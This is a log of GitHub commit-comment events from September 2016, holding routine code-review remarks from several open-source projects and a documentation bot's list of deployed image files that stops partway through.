{"id":"4645309767","type":"CommitCommentEvent","actor":{"login":"chrisarcand"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19246460,"position":1,"line":1,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T19:11:55Z","updated_at":"2016-09-30T19:11:55Z","body":"Naming Things! 🏆 "}},"created_at":"2016-09-30T19:11:55Z"}
{"id":"4645314024","type":"CommitCommentEvent","actor":{"login":"sanderux"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19246468,"position":4,"line":624,"path":"src/modules/navigator/mission.cpp","commit_id":"3b8480d56900d6885804d60c1e7b8b54df28e055","created_at":"2016-09-30T19:12:48Z","updated_at":"2016-09-30T19:12:48Z","body":"@LorenzMeier should this new mission_item book be inited, if so, where?"}},"created_at":"2016-09-30T19:12:48Z"}
{"id":"4645314064","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"daxsis/Ruby_movies"},"payload":{"comment":{"id":19246469,"position":20,"line":5,"path":"movies.rb","commit_id":"b47a115f153a3bbf2346d2a630b44043543c6c8f","created_at":"2016-09-30T19:12:48Z","updated_at":"2016-09-30T19:12:48Z","body":"а) не используй `and`, используй `&&` (оператор `and` имеет несколько другой смысл)\r\nб) разделив логику на две части, можно сделать _намного_ понятнее: (1) какое будет имя файла (переданное или дефолтное) и (2) существует ли этот файл.\r\nв) никогда не меняй ARGV, если на 100% не уверен что тебе это надо (а это не тот случай, лучше завести переменную `file_name`)"}},"created_at":"2016-09-30T19:12:48Z"}
{"id":"4645316407","type":"CommitCommentEvent","actor":{"login":"sanderux"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19246473,"position":4,"line":98,"path":"src/modules/navigator/navigation.h","commit_id":"3b8480d56900d6885804d60c1e7b8b54df28e055","created_at":"2016-09-30T19:13:16Z","updated_at":"2016-09-30T19:13:16Z","body":"@LorenzMeier should this new mission_item book be inited, if so, where?"}},"created_at":"2016-09-30T19:13:16Z"}
{"id":"4645319712","type":"CommitCommentEvent","actor":{"login":"levity"},"repo":{"name":"Hylozoic/hylo-redux"},"payload":{"comment":{"id":19246484,"position":null,"line":null,"path":null,"commit_id":"a6afd582ae593d0f40bb44a592db02c21df628cf","created_at":"2016-09-30T19:13:55Z","updated_at":"2016-09-30T19:13:55Z","body":"@Connoropolous here's how to use a feature flag"}},"created_at":"2016-09-30T19:13:55Z"}
{"id":"4645319861","type":"CommitCommentEvent","actor":{"login":"JohnsonChung"},"repo":{"name":"PSEJP/junban-mobilekiosk"},"payload":{"comment":{"id":19246486,"position":null,"line":null,"path":null,"commit_id":"e57a163b941929a38f6720c0ea0cbd74082ab8b4","created_at":"2016-09-30T19:13:58Z","updated_at":"2016-09-30T19:13:58Z","body":"讓 radio-group 的資料驗證可以使用"}},"created_at":"2016-09-30T19:13:58Z"}
{"id":"4645321505","type":"CommitCommentEvent","actor":{"login":"ivansglazunov"},"repo":{"name":"AncientSouls/Lab"},"payload":{"comment":{"id":19246496,"position":null,"line":null,"path":null,"commit_id":"4c39447d9a9459d63181d6c9f280634c350c46da","created_at":"2016-09-30T19:14:19Z","updated_at":"2016-09-30T19:14:19Z","body":"#2 "}},"created_at":"2016-09-30T19:14:19Z"}
{"id":"4645322879","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"daxsis/Ruby_movies"},"payload":{"comment":{"id":19246499,"position":39,"line":12,"path":"movies.rb","commit_id":"b47a115f153a3bbf2346d2a630b44043543c6c8f","created_at":"2016-09-30T19:14:35Z","updated_at":"2016-09-30T19:14:35Z","body":"Не, это нерубёвый способ читать файл. File.read или File.readlines, или File.open().each — лучче.\r\n\r\nМы ОЧЕНЬ редко используем цикл `while` (его смысл — «пока не произойдёт нечто, что мы не можем предсказать», а в данном случае смысл — «перебрать все строки», это куда более контролируемый процесс)"}},"created_at":"2016-09-30T19:14:35Z"}
{"id":"4645324402","type":"CommitCommentEvent","actor":{"login":"LorenzMeier"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19246502,"position":4,"line":98,"path":"src/modules/navigator/navigation.h","commit_id":"3b8480d56900d6885804d60c1e7b8b54df28e055","created_at":"2016-09-30T19:14:55Z","updated_at":"2016-09-30T19:14:55Z","body":"The proper thing to do would be to check that a new mission item is initialised with the default constructor: mission_item_s item = {};\r\n\r\nThat will set ints / floats to the numerical 0 value and bools to false."}},"created_at":"2016-09-30T19:14:55Z"}
{"id":"4645325028","type":"CommitCommentEvent","actor":{"login":"Andrew-Quebe"},"repo":{"name":"PaoloRotolo/AppIntro"},"payload":{"comment":{"id":19246505,"position":4,"line":20,"path":".github/ISSUE_TEMPLATE.md","commit_id":"d70f69d46ed64a69663d5825764df5d9d7a66432","created_at":"2016-09-30T19:15:03Z","updated_at":"2016-09-30T19:15:03Z","body":"whoops xD"}},"created_at":"2016-09-30T19:15:03Z"}
{"id":"4645325246","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"daxsis/Ruby_movies"},"payload":{"comment":{"id":19246507,"position":44,"line":17,"path":"movies.rb","commit_id":"b47a115f153a3bbf2346d2a630b44043543c6c8f","created_at":"2016-09-30T19:15:06Z","updated_at":"2016-09-30T19:15:06Z","body":"мы не сравниваем с `true`, напоминаю ;)"}},"created_at":"2016-09-30T19:15:06Z"}
{"id":"4645328989","type":"CommitCommentEvent","actor":{"login":"chrisarcand"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19246511,"position":30,"line":30,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T19:15:52Z","updated_at":"2016-09-30T19:15:52Z","body":"Yeah this was changed due to the change in approach. Instead of making this weird thing that both sides of sharing would access, this thing is now a simple validating model explicitly to share resources. Nice and simple, composable, and easy to use (everyone knows how to use ActiveModel validations). We may or may not even need a separate class for the receiving of the share (but not caring about that right now). "}},"created_at":"2016-09-30T19:15:52Z"}
{"id":"4645329155","type":"CommitCommentEvent","actor":{"login":"cbeer"},"repo":{"name":"sul-dlss/stacks"},"payload":{"comment":{"id":19246512,"position":null,"line":null,"path":null,"commit_id":"04635861df9c3319e729e7f81770d800352699da","created_at":"2016-09-30T19:15:54Z","updated_at":"2016-09-30T19:15:54Z","body":"`cap deploy production --hosts=sul-stacks-prod-c.stanford.edu` might be useful?"}},"created_at":"2016-09-30T19:15:54Z"}
{"id":"4645331095","type":"CommitCommentEvent","actor":{"login":"erikerikson"},"repo":{"name":"serverless/serverless"},"payload":{"comment":{"id":19246515,"position":10,"line":19,"path":"lib/plugins/aws/deploy/compile/events/apiGateway/lib/authorizers.js","commit_id":"dd251848583a02a47d345bf9b9a2acd1a7a39e0c","created_at":"2016-09-30T19:16:18Z","updated_at":"2016-09-30T19:16:18Z","body":"heyya @eahefnawy - is this line dead code?  the result isn't used so the only reason I can find for the line is that the getFunction will validate the `authorizer` value and throw an exception or something.\r\n\r\nRemoving this doesn't effect the unit tests so I'd like to remove this in the latest code but wanted to double check that there isn't some value it provides.\r\n\r\nThanks!"}},"created_at":"2016-09-30T19:16:18Z"}
{"id":"4645333625","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19246518,"position":null,"line":null,"path":null,"commit_id":"f1bc3e6bd068baea96fd89e20570721a7385891c","created_at":"2016-09-30T19:16:53Z","updated_at":"2016-09-30T19:16:53Z","body":"We could probably implement the graph network real simple by sending a ping out to all wanted connection which would get a pong letting them know which network layer they are attached to which would store the layer type and connection in the graph. If no connection is listed it would search / discover the path."}},"created_at":"2016-09-30T19:16:53Z"}
{"id":"4645335039","type":"CommitCommentEvent","actor":{"login":"yzaki"},"repo":{"name":"gfacciol/homebrew-keckcaves"},"payload":{"comment":{"id":19246521,"position":null,"line":null,"path":null,"commit_id":"4b8c8eb91d18075b7542497674119370bfdc1e91","created_at":"2016-09-30T19:17:11Z","updated_at":"2016-09-30T19:17:11Z","body":"Thanks for the reply. Unfortunately this does not work, I get the following error:\n\n==> Patching\npatching file GL/GLGeometryShader.cpp\nHunk #1 FAILED at 133.\n1 out of 1 hunk FAILED -- saving rejects to file GL/GLGeometryShader.cpp.rej\nError: Failure while executing: /usr/bin/patch -g 0 -f -p0\n\n\n-----\nDr. Yasir Zaki\nLecturer of Computer Science\nNYU Abu Dhabi\nComputational Research Building (A2)\nOffice Number 195\nOffice Tel (UAE): +971 2 628 4860\n\nNYU Abu Dhabi, Saadiyat Campus\nP.O. Box 129188\nAbu Dhabi, United Arab Emirates\n\n> On Sep 29, 2016, at 3:44 PM, gfacciol <notifications@github.com> wrote:\n> \n> While the pull request is not merged, I think that you could use:\n> \n> brew tap gfacciol/homebrew-keckcaves\n> brew install gfacciol/homebrew-keckcaves/vrui\n> brew install gfacciol/homebrew-keckcaves/lidarviewer\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/gfacciol/homebrew-keckcaves/commit/4b8c8eb91d18075b7542497674119370bfdc1e91#commitcomment-19222446>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AJXPuxYoXulqdoT_Eva8t-vGAN3gg27Fks5qu6SzgaJpZM4KJ4Hb>.\n> \n\n"}},"created_at":"2016-09-30T19:17:11Z"}
{"id":"4645335365","type":"CommitCommentEvent","actor":{"login":"chrisarcand"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19246522,"position":33,"line":33,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T19:17:15Z","updated_at":"2016-09-30T19:17:15Z","body":"> Maybe arguments or args instead of attributes since they are just arguments passed in, they're not attributes for the share yet. Attributes is easy to confuse with the attributes getter/setter on AR objects.\r\n\r\nMeh, they're attributes as far as this model is concerned (as this is an ActiveModel object now), but I do see your point. Will change (because the name is shorter ;) )\r\n\r\n> TODO: We need to validate passed in features are available to the user\r\n\r\nYup see pending tests"}},"created_at":"2016-09-30T19:17:15Z"}
{"id":"4645338695","type":"CommitCommentEvent","actor":{"login":"openp2pdesign"},"repo":{"name":"fablabbcn/fab-city-dashboard"},"payload":{"comment":{"id":19246532,"position":null,"line":null,"path":null,"commit_id":"20d8dcc52ddb2ba13d9b805eee184bc4548d4dd6","created_at":"2016-09-30T19:17:58Z","updated_at":"2016-09-30T19:17:58Z","body":"@JulienParis please check that the merge was ok, especially for the load_data.html file.\r\nYou can keep the development directly in the master branch and delete the Leaflet_basics"}},"created_at":"2016-09-30T19:17:58Z"}
{"id":"4645340897","type":"CommitCommentEvent","actor":{"login":"Alberto97"},"repo":{"name":"F-AOSP/manifest"},"payload":{"comment":{"id":19246539,"position":9,"line":10,"path":"moto-msm8916.xml","commit_id":"ec702e0428c7a2d097e011ce7cb20682f29e835c","created_at":"2016-09-30T19:18:25Z","updated_at":"2016-09-30T19:18:25Z","body":"Fixed, thank you :)"}},"created_at":"2016-09-30T19:18:25Z"}
{"id":"4645341866","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19246541,"position":null,"line":null,"path":null,"commit_id":"65b0a46599f6d5c3921886be066d78204d80c3ac","created_at":"2016-09-30T19:18:37Z","updated_at":"2016-09-30T19:18:37Z","body":"The following doc(s) have been deployed to the [1894image](https:///docs) Multidev environment:\n- [source/docs/assets/images/add-ssh-key-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/add-ssh-key-dashboard.png)\n- [source/docs/assets/images/backup-tool.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/backup-tool.png)\n- [source/docs/assets/images/billing_update.jpg](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/billing_update.jpg)\n- [source/docs/assets/images/commit-deployed-pantheon-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/commit-deployed-pantheon-dashboard.png)\n- [source/docs/assets/images/commit-id.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/commit-id.png)\n- [source/docs/assets/images/confirm-plan-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/confirm-plan-dashboard.png)\n- [source/docs/assets/images/connection-info.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/connection-info.png)\n- [source/docs/assets/images/connection-mode-git.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/connection-mode-git.png)\n- [source/docs/assets/images/connection-mode-sftp.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/connection-mode-sftp.png)\n- [source/docs/assets/images/convert-urls.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/convert-urls.png)\n- [source/docs/assets/images/create-org-invite-team-members.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/create-org-invite-team-members.png)\n- [source/docs/assets/images/create-site-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/create-site-dashboard.png)\n- [source/docs/assets/images/dashboard/add-ssh-key-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/add-ssh-key-dashboard.png)\n- [source/docs/assets/images/dashboard/backup-tool.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/backup-tool.png)\n- [source/docs/assets/images/dashboard/billing_update.jpg](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/billing_update.jpg)\n- [source/docs/assets/images/dashboard/commit-deployed-pantheon-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/commit-deployed-pantheon-dashboard.png)\n- [source/docs/assets/images/dashboard/commit-id.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/commit-id.png)\n- [source/docs/assets/images/dashboard/confirm-plan-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/confirm-plan-dashboard.png)\n- [source/docs/assets/images/dashboard/connection-info.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/connection-info.png)\n- [source/docs/assets/images/dashboard/connection-mode-git.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/connection-mode-git.png)\n- [source/docs/assets/images/dashboard/connection-mode-sftp.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/connection-mode-sftp.png)\n- [source/docs/assets/images/dashboard/convert-urls.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/convert-urls.png)\n- [source/docs/assets/images/dashboard/create-org-invite-team-members.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/create-org-invite-team-members.png)\n- [source/docs/assets/images/dashboard/create-site-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/create-site-dashboard.png)\n- [source/docs/assets/images/dashboard/deploy-live.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/deploy-live.png)\n- [source/docs/assets/images/dashboard/deploy-log-live-env.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/deploy-log-live-env.png)\n- [source/docs/assets/images/dashboard/dev-code-pendingchanges-commit.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/dev-code-pendingchanges-commit.png)\n- [source/docs/assets/images/dashboard/diff-screen.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/diff-screen.png)\n- [source/docs/assets/images/dashboard/direct-download-archive.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/direct-download-archive.png)\n- [source/docs/assets/images/dashboard/direct-download-backup.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/direct-download-backup.png)\n- [source/docs/assets/images/dashboard/drush-aliases.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/drush-aliases.png)\n- [source/docs/assets/images/dashboard/edu-read-instructions.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/edu-read-instructions.png)\n- [source/docs/assets/images/dashboard/edu-site-selector.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/edu-site-selector.png)\n- [source/docs/assets/images/dashboard/environment-access.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/environment-access.png)\n- [source/docs/assets/images/dashboard/git-string.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/git-string.png)\n- [source/docs/assets/images/dashboard/import-tool-db-and-files.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/import-tool-db-and-files.png)\n- [source/docs/assets/images/dashboard/interface-dev-code-sftp-commit.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/interface-dev-code-sftp-commit.png)\n- [source/docs/assets/images/dashboard/interface-site-settings-about.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/interface-site-settings-about.png)\n- [source/docs/assets/images/dashboard/interface-workflow-tool.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/interface-workflow-tool.png)\n- [source/docs/assets/images/dashboard/invite-business-owner.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/invite-business-owner.png)\n- [source/docs/assets/images/dashboard/launch-check-file-system-error.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/launch-check-file-system-error.png)\n- [source/docs/assets/images/dashboard/lock-environment.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/lock-environment.png)\n- [source/docs/assets/images/dashboard/machine-token-ready.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/machine-token-ready.png)\n- [source/docs/assets/images/dashboard/manual-site-backup.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/manual-site-backup.png)\n- [source/docs/assets/images/dashboard/merged-pull-request-1-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/merged-pull-request-1-dashboard.png)\n- [source/docs/assets/images/dashboard/migrate-existing-site.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/migrate-existing-site.png)\n- [source/docs/assets/images/dashboard/migration-authentication-error.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/migration-authentication-error.png)\n- [source/docs/assets/images/dashboard/migration-authentication-prompt.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/migration-authentication-prompt.png)\n- [source/docs/assets/images/dashboard/multi_org1.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/multi_org1.png)\n- [source/docs/assets/images/dashboard/multi_org2.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/multi_org2.png)\n- [source/docs/assets/images/dashboard/mysql-info.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/mysql-info.png)\n- [source/docs/assets/images/dashboard/new-env-configs.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/new-env-configs.png)\n- [source/docs/assets/images/dashboard/new-relic-add-on-image.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/new-relic-add-on-image.png)\n- [source/docs/assets/images/dashboard/organization-dashboard-tour.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/organization-dashboard-tour.png)\n- [source/docs/assets/images/dashboard/pantheon-create-machine-token.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/pantheon-create-machine-token.png)\n- [source/docs/assets/images/dashboard/pantheon-dashboard-git-commit-messages.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/pantheon-dashboard-git-commit-messages.png)\n- [source/docs/assets/images/dashboard/pantheon-dashboard-git-connection-info.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/pantheon-dashboard-git-connection-info.png)\n- [source/docs/assets/images/dashboard/pantheon-dashboard-settings-about-site-upstream.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/pantheon-dashboard-settings-about-site-upstream.png)\n- [source/docs/assets/images/dashboard/pantheon-dashboard-uncommitted-changes.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/pantheon-dashboard-uncommitted-changes.png)\n- [source/docs/assets/images/dashboard/pantheon-for-agencies-registration.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/pantheon-for-agencies-registration.png)\n- [source/docs/assets/images/dashboard/pantheon-user-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/pantheon-user-dashboard.png)\n- [source/docs/assets/images/dashboard/payment-invite.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/payment-invite.png)\n- [source/docs/assets/images/dashboard/pes-options.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/pes-options.png)\n- [source/docs/assets/images/dashboard/remove-ssh-key.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/remove-ssh-key.png)\n- [source/docs/assets/images/dashboard/restore-button.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/restore-button.png)\n- [source/docs/assets/images/dashboard/sandbox-make-owner.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/sandbox-make-owner.png)\n- [source/docs/assets/images/dashboard/select-a-plan-and-billing.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/select-a-plan-and-billing.png)\n- [source/docs/assets/images/dashboard/sftp-connection-info.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/sftp-connection-info.png)\n- [source/docs/assets/images/dashboard/sftp-enabled.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/sftp-enabled.png)\n- [source/docs/assets/images/dashboard/single-archive-import.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/single-archive-import.png)\n- [source/docs/assets/images/dashboard/site-admin-env-links.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/site-admin-env-links.png)\n- [source/docs/assets/images/dashboard/site-dashboard-image.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/site-dashboard-image.png)\n- [source/docs/assets/images/dashboard/status-tab.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/status-tab.png)\n- [source/docs/assets/images/dashboard/successful-site-migration-complete-blogvault.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/successful-site-migration-complete-blogvault.png)\n- [source/docs/assets/images/dashboard/team-modal.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/team-modal.png)\n- [source/docs/assets/images/dashboard/terminus-cli-code-committed-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/terminus-cli-code-committed-dashboard.png)\n- [source/docs/assets/images/dashboard/terminus-cli-code-to-commit-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/terminus-cli-code-to-commit-dashboard.png)\n- [source/docs/assets/images/dashboard/terminus-cli-open-dash.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/terminus-cli-open-dash.png)\n- [source/docs/assets/images/dashboard/terminus-commit-with-message.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/terminus-commit-with-message.png)\n- [source/docs/assets/images/dashboard/test-env.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/test-env.png)\n- [source/docs/assets/images/dashboard/uncommitted-pantheon-yml.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/uncommitted-pantheon-yml.png)\n- [source/docs/assets/images/dashboard/update-plan-prompt-https.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/update-plan-prompt-https.png)\n- [source/docs/assets/images/dashboard/upstream-link.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/upstream-link.png)\n- [source/docs/assets/images/dashboard/user-account-machine-token-list.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/user-account-machine-token-list.png)\n- [source/docs/assets/images/dashboard/verify-reroute-email-dashboard-commits1.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/verify-reroute-email-dashboard-commits1.png)\n- [source/docs/assets/images/dashboard/verify-reroute-email-dashboard-commits2.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/verify-reroute-email-dashboard-commits2.png)\n- [source/docs/assets/images/dashboard/visit-development-site.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/visit-development-site.png)\n- [source/docs/assets/images/dashboard/workflow-tab.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/workflow-tab.png)\n- [source/docs/assets/images/deploy-live.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/deploy-live.png)\n- 